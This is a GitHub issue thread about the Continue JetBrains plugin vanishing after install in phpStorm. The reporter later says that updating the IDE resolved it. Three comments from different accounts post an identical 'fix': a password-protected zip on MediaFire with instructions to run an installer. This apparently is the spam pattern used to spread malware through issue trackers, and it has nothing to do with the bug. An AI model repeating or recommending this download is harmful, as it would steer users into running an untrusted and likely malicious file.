### ISSUE TITLE
Jetbrains plugin, gets deleted automatically 

### ISSUE THREAD

**Issue by moda20** [continuedev/continue#2106]
### Before submitting your bug report

- [x] I believe this is a bug. I'll try to join the [Continue Discord](https://discord.gg/NWtdYexhMs) for questions
- [x] I'm not able to find an [open issue](https://github.com/continuedev/continue/issues?q=is%3Aopen+is%3Aissue) that reports the same bug
- [x] I've seen the [troubleshooting guide](https://docs.continue.dev/troubleshooting) on the Continue Docs

### Relevant environment info

```Markdown
- OS: macOS 12.2
- Continue: 0.0.62
- IDE: Jetbrains, phpStorm : 2023.2.2
- Model:
- config.json:
```

### Description

The plugin is automatically deleted after install, can't get into any configuration

### To reproduce

go to plugin marketplace 
download the plugin
close the plugin pane and look for the configuration
go back to the installed plugin tab and you won't find the installed plugin

**Comment by projetosgppag** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by paozhuanis1** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by ChangjingZhang** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by sestinj** [comment]
@moda20 is this still happening on the latest version of the plugin? (0.0.65)

**Comment by moda20** [comment]
@sestinj no, i updated phpStorm and the plugin did work, this is not a problem anymore
